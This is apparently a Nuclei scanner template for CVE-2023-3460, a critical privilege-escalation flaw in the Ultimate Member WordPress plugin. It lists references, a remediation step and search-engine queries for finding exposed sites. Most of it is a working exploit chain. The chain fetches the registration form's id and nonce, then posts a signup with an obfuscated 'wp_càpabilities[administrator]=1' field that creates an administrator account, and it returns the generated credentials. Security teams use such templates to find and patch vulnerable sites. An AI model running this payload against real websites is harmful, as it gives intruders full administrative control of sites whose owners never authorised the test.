id: CVE-2023-3460 info: name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation author: DhiyaneshDk severity: critical description: | The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. impact: | Unauthenticated users can gain unauthorized access and perform actions with elevated privileges. remediation: | Upgrade to Ultimate Member version 2.6.7 or later. reference: - https://github.com/gbrsh/CVE-2023-3460 - https://nvd.nist.gov/vuln/detail/CVE-2023-3460 - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7 - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/ - https://wordpress.org/plugins/ultimate-member/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 epss-score: 0.06326 epss-percentile: 0.93621 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: ultimatemember product: ultimate_member framework: wordpress shodan-query: http.html:/wp-content/plugins/ultimate-member fofa-query: body=/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1 Host: {{Hostname}} - | GET /index.php/register/?{{version}} HTTP/1.1 Host: {{Hostname}} - | GET {{path}} HTTP/1.1 Host: {{Hostname}} - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1 matchers: - type: dsl dsl: - contains(to_lower(body_1), "ultimate member") - regex("wordpress_logged_in_[a-z0-9]{32}", header_4) - status_code_4 == 302 condition: and extractors: - type: regex name: path part: location_2 group: 1 regex: - '([a-z:/.]+)' internal: true - type: regex name: version part: body_1 group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' internal: true - type: regex name: formid part: body_3 group: 1 regex: - 'name="form_id" id="form_id_([0-9]+)"' internal: true - type: regex name: wpnonce part: body_3 group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)"' internal: true - type: dsl dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' # digest: 490a004630440220173eeac6cfcdda83cedba6a13700d48f6167c4a69304204c41c53291982fec3602204eb02aaf7b7b0995b3b8092e842f23bbb69e20c6b44bb3a7335caf50d296446b:922c64590222798bb761d5b6d8e72950